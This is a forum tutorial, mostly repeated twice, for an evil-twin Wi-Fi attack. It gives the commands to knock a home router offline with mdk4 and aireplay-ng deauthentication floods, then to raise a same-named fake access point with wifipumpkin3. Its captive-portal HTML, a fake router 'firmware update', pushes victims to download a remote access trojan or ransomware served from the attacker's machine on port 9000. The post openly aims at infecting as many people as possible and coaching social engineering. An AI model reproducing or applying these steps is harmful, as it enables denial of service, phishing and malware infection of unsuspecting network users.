DoS Wi-Fi Router Captive Portal Methodology
Posted: Tue Jun 04, 2024 5:18 am
We shall craft a bespoke captive portal, which shall be disseminated to those individuals who join our fictitious wireless access point, with the intent of socially engineering them into performing actions favourable to our objectives. For instance, inducing them to download malicious software.
Prerequisites:
- Kali Linux OS
- Wifipumpkin3 Software: https://github.com/P0cL4bs/wifipumpkin3
- The Internet Protocol address of one's Kali Linux machine.
Let us proceed with this endeavour forthwith by merely modifying one of the default captive portals that accompanies wifipumpkin3, christened "DarkLogin".
(Should you desire to follow the proper instructions, you may peruse the following resource: https://wifipumpkin3.github.io/docs/get ... ed#proxies).
Utilising the Terminal in Kali:
One must commence by expunging the entire contents of the aforementioned file prior to proceeding. Thereafter, one shall copy and paste the text highlighted in the verdant hue. Subsequently, one must modify the portions accentuated in the purplish tint to reflect the desired particulars. Finally, one must commit the changes and exit the file:
<html>
<head>
<title>Wi-Fi Router Name 'e.g. Asus'</title>
<style>
<body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;} .content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;} .blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;} .title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;} .details li { list-style: none; padding: 4px 0;} .footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; } </style>
</head>
<body>
<center>
<div class="content">
<div class="title" id="msg_title"><b>Wireless Router Firmware Necessitates an Update</b></div>
<ul class="detailia">
<div id="main">
<div id="msg">
<li><b>Internet access has been blocked for safety.<br><br> Please download and install the new critical firmware for XYZ router:<br> XY Router:</b><span class="url"><a href="https://YOUR_IP:9000/Firmware_Update.exe"><b>Firmware Update</b></a></span><b></b></li>
</div>
</ul>
</div>
<div class="footer">XY Router <b>Firmware Update</b></div>
</center>
</body>
</html>
The appellation "https://YOUR_IP:9000/Firmware_Update.exe" denotes the malicious software, Remote Access Trojan, ransomware, or other nefarious program, which shall be hosted on your Kali Linux OS, utilising a separate web server operating on port 9000. This will enable your victims to download said malicious software.
(In the event that you do not possess an executable file for testing purposes, one may simply create a file and rename it to "Firmware_Update.test" in order to follow along with this exemplar.)
For our modifications to take effect, we must reconfigure Wifipumpkin3. Within your Kali, employing the Terminal, one shall proceed as follows:
This process shall reconfigure wifipumpkin3 and preserve your bespoke captive portal, enabling us to access it from the "proxies" section under "DarkLogin". We have significantly deviated from the prescribed path and merely altered the HTML content for that captive portal. Once we initiate our attack, our victims shall be presented with the custom captive portal we have just configured.
When creating your own captive portals, it is imperative to apply your social engineering skills to the HTML content of the captive portal in order to compel them to perform whatever action aligns with your objective. Dedicate ample time to developing the HTML content and invest substantial efforts into it.
These examples are merely rudimentary and basics, but the objective is to demonstrate the fundamentals, upon which you can expand. Ensure that your HTML and social engineering attacks are credible.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Very well, now that we have configured our bespoke captive portal, we shall employ the mdk4/aircrack-ng suite to execute a Denial of Service attack on the Wireless Fidelity router and establish our fictitious access point with wifipumpkin3.
Our objective is to render their router inoperative and create a counterfeit access point with the identical Wireless Fidelity network name. Consequently, when other individuals attempt to troubleshoot their malfunctioning equipment, they shall inadvertently join our spurious access point, which bears the same name as their legitimate network.
One must conduct tests before deploying these measures against others in the wild.
For the purposes of this exemplar, we shall be targeting a Wireless Fidelity network christened "Dead".
I shall be utilising two Alfa network cards, designated as wlan0 and wlan1.
We must commence by executing a Denial of Service attack on the target Wireless Fidelity network router, thereby rendering it inoperative.
Within the Kali Terminal, one shall type the following:
Example: sudo airmon-ng start wlan0
At present, we desire to search for the Wireless Fidelity network that we intend to target and obtain its Basic Service Set Identifier:
Once you have located the Basic Service Set Identifier of your intended target, you may hold down the "CTRL" key and strike the letter "C" on your keyboard:
As you can observe in the screenshot above, the "Dead" Wireless Fidelity network possesses a Basic Service Set Identifier, which is the information we require in order to render the router inoperative.
The time has come to launch a Denial of Service attack against the Wireless Fidelity router in an attempt to de-authenticate everyone connected to it, effectively expelling them from the network and preventing anyone from joining it again. Most personal home routers will not be able to withstand this type of attack for an extended period, but there are numerous Wireless Fidelity routers available, so you will discover what works for you in your particular location as you gain experience. This technique may or may not be successful.
Once you have launched a Denial of Service attack against a Wireless Fidelity router, wait at least 3-5 minutes before launching your fictitious access point with wifipumpkin3 to ensure that the target Wireless Fidelity network is down. Eventually, someone will notice that their Wireless Fidelity network is down, and they will begin to search for it, at which point they will find your counterfeit access point. As soon as they connect, they will be presented with your captive portal page.
In the Terminal of the Kali:
Example: sudo mdk4 INTERFACE a -a D8:AC:AB:5A:3D:68
Example: sudo aireplay-ng --deauth 0 -a D8:AC:AB:5A:3D:68 wlan0
Permit one of your Alfa network cards to continue executing the Denial of Service attack on the router, while utilising your second Alfa card to establish your counterfeit access point.
Once you observe that the router is inoperative, bring up your spurious access point with wifipumpkin3 using your other card.
Open a new Terminal window in Kali:
Open a new Terminal window in Kali:
(Allow wifipumpkin3 to continue running and open a new window. Navigate to the directory where "Firmware_Update.exe" is located and type the following)
This will initiate a web server on port 9000, enabling your victims to download your malicious software, thereby allowing them to participate in the festivities. All you must do is keep this window open, and when someone downloads your file, you will observe the GET request here. Strike "CTRL+C" when you wish to terminate this operation, and type "stop" in the wifipumpkin3 console once you have infected as many individuals as you deem feasible.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- There exist a multitude of computers out there, with individuals utilising a vast array of different web browsers, so bear in mind that each device will behave somewhat differently with these attacks.
- It is advisable to code your webpages to recognise specific devices and display tailored HTML content for that device, with social engineering in mind (for example: if a mobile device is used, then your landing page contains instructions to use a computer and not a mobile device, or it is simply a phishing page, or whatever course of action you deem appropriate). Again, ensure that everything appears as professional as possible.
Prerequisites:
- Kali Linux OS
- Wifipumpkin3 Software: https://github.com/P0cL4bs/wifipumpkin3
- The Internet Protocol address of one's Kali Linux machine.
Let us proceed with this endeavour forthwith by merely modifying one of the default captive portals that accompanies wifipumpkin3, christened "DarkLogin".
(Should you desire to follow the proper instructions, you may peruse the following resource: https://wifipumpkin3.github.io/docs/get ... ed#proxies).
Utilising the Terminal in Kali:
Code: Select all
sudo gedit wifipumpkin3/config/templates/DarkLogin/templates/login.html
One must commence by expunging the entire contents of the aforementioned file prior to proceeding. Thereafter, one shall copy and paste the text highlighted in the verdant hue. Subsequently, one must modify the portions accentuated in the purplish tint to reflect the desired particulars. Finally, one must commit the changes and exit the file:
<html>
<head>
<title>Wi-Fi Router Name 'e.g. Asus'</title>
<style>
<body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;} .content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;} .blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;} .title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;} .details li { list-style: none; padding: 4px 0;} .footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; } </style>
</head>
<body>
<center>
<div class="content">
<div class="title" id="msg_title"><b>Wireless Router Firmware Necessitates an Update</b></div>
<ul class="detailia">
<div id="main">
<div id="msg">
<li><b>Internet access has been blocked for safety.<br><br> Please download and install the new critical firmware for XYZ router:<br> XY Router:</b><span class="url"><a href="https://YOUR_IP:9000/Firmware_Update.exe"><b>Firmware Update</b></a></span><b></b></li>
</div>
</ul>
</div>
<div class="footer">XY Router <b>Firmware Update</b></div>
</center>
</body>
</html>
The appellation "https://YOUR_IP:9000/Firmware_Update.exe" denotes the malicious software, Remote Access Trojan, ransomware, or other nefarious program, which shall be hosted on your Kali Linux OS, utilising a separate web server operating on port 9000. This will enable your victims to download said malicious software.
(In the event that you do not possess an executable file for testing purposes, one may simply create a file and rename it to "Firmware_Update.test" in order to follow along with this exemplar.)
For our modifications to take effect, we must reconfigure Wifipumpkin3. Within your Kali, employing the Terminal, one shall proceed as follows:
Code: Select all
cd ~/wifipumpkin3
Code: Select all
sudo python3 setup.py install
This process shall reconfigure wifipumpkin3 and preserve your bespoke captive portal, enabling us to access it from the "proxies" section under "DarkLogin". We have significantly deviated from the prescribed path and merely altered the HTML content for that captive portal. Once we initiate our attack, our victims shall be presented with the custom captive portal we have just configured.
When creating your own captive portals, it is imperative to apply your social engineering skills to the HTML content of the captive portal in order to compel them to perform whatever action aligns with your objective. Dedicate ample time to developing the HTML content and invest substantial efforts into it.
These examples are merely rudimentary and basics, but the objective is to demonstrate the fundamentals, upon which you can expand. Ensure that your HTML and social engineering attacks are credible.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Very well, now that we have configured our bespoke captive portal, we shall employ the mdk4/aircrack-ng suite to execute a Denial of Service attack on the Wireless Fidelity router and establish our fictitious access point with wifipumpkin3.
Our objective is to render their router inoperative and create a counterfeit access point with the identical Wireless Fidelity network name. Consequently, when other individuals attempt to troubleshoot their malfunctioning equipment, they shall inadvertently join our spurious access point, which bears the same name as their legitimate network.
One must conduct tests before deploying these measures against others in the wild.
For the purposes of this exemplar, we shall be targeting a Wireless Fidelity network christened "Dead".
I shall be utilising two Alfa network cards, designated as wlan0 and wlan1.
We must commence by executing a Denial of Service attack on the target Wireless Fidelity network router, thereby rendering it inoperative.
Within the Kali Terminal, one shall type the following:
Code: Select all
sudo airmon-ng check kill
Code: Select all
sudo airmon-ng start INTERFACE
Example: sudo airmon-ng start wlan0
At present, we desire to search for the Wireless Fidelity network that we intend to target and obtain its Basic Service Set Identifier:
Code: Select all
sudo airodump-ng INTERFACE
Once you have located the Basic Service Set Identifier of your intended target, you may hold down the "CTRL" key and strike the letter "C" on your keyboard:
As you can observe in the screenshot above, the "Dead" Wireless Fidelity network possesses a Basic Service Set Identifier, which is the information we require in order to render the router inoperative.
The time has come to launch a Denial of Service attack against the Wireless Fidelity router in an attempt to de-authenticate everyone connected to it, effectively expelling them from the network and preventing anyone from joining it again. Most personal home routers will not be able to withstand this type of attack for an extended period, but there are numerous Wireless Fidelity routers available, so you will discover what works for you in your particular location as you gain experience. This technique may or may not be successful.
Once you have launched a Denial of Service attack against a Wireless Fidelity router, wait at least 3-5 minutes before launching your fictitious access point with wifipumpkin3 to ensure that the target Wireless Fidelity network is down. Eventually, someone will notice that their Wireless Fidelity network is down, and they will begin to search for it, at which point they will find your counterfeit access point. As soon as they connect, they will be presented with your captive portal page.
In the Terminal of the Kali:
Code: Select all
sudo mdk4 INTERFACE a -a BSSID
Example: sudo mdk4 INTERFACE a -a D8:AC:AB:5A:3D:68
Code: Select all
sudo aireplay-ng --deauth 0 -a BSSID INTERFACE
Example: sudo aireplay-ng --deauth 0 -a D8:AC:AB:5A:3D:68 wlan0
Permit one of your Alfa network cards to continue executing the Denial of Service attack on the router, while utilising your second Alfa card to establish your counterfeit access point.
Once you observe that the router is inoperative, bring up your spurious access point with wifipumpkin3 using your other card.
Open a new Terminal window in Kali:
Code: Select all
sudo wifipumpkin3 -i INTERFACE
Code: Select all
set ssid Wi-Fi_Network_Name
Code: Select all
ignore pydns_server
Code: Select all
set plugin sniffkin3 false
Code: Select all
set proxy captiveflask
Code: Select all
start
Open a new Terminal window in Kali:
(Allow wifipumpkin3 to continue running and open a new window. Navigate to the directory where "Firmware_Update.exe" is located and type the following)
Code: Select all
sudo python3 -m http.server 9000
This will initiate a web server on port 9000, enabling your victims to download your malicious software, thereby allowing them to participate in the festivities. All you must do is keep this window open, and when someone downloads your file, you will observe the GET request here. Strike "CTRL+C" when you wish to terminate this operation, and type "stop" in the wifipumpkin3 console once you have infected as many individuals as you deem feasible.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- There exist a multitude of computers out there, with individuals utilising a vast array of different web browsers, so bear in mind that each device will behave somewhat differently with these attacks.
- It is advisable to code your webpages to recognise specific devices and display tailored HTML content for that device, with social engineering in mind (for example: if a mobile device is used, then your landing page contains instructions to use a computer and not a mobile device, or it is simply a phishing page, or whatever course of action you deem appropriate). Again, ensure that everything appears as professional as possible.